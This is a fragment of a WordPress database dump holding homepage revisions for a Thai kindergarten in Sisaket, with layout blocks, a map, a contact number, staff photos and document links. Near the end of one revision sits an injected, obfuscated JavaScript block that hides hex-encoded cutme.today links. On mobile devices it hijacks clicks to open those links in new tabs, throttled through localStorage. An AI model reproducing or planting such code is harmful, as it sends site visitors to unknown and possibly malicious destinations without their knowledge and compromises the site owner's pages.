{\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:41:39','2025-07-15 07:41:39','',19,'http://watprato.ssk.in.th/?p=687',0,'revision','',0),
(689,1,'2025-07-15 14:42:36','2025-07-15 07:42:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- 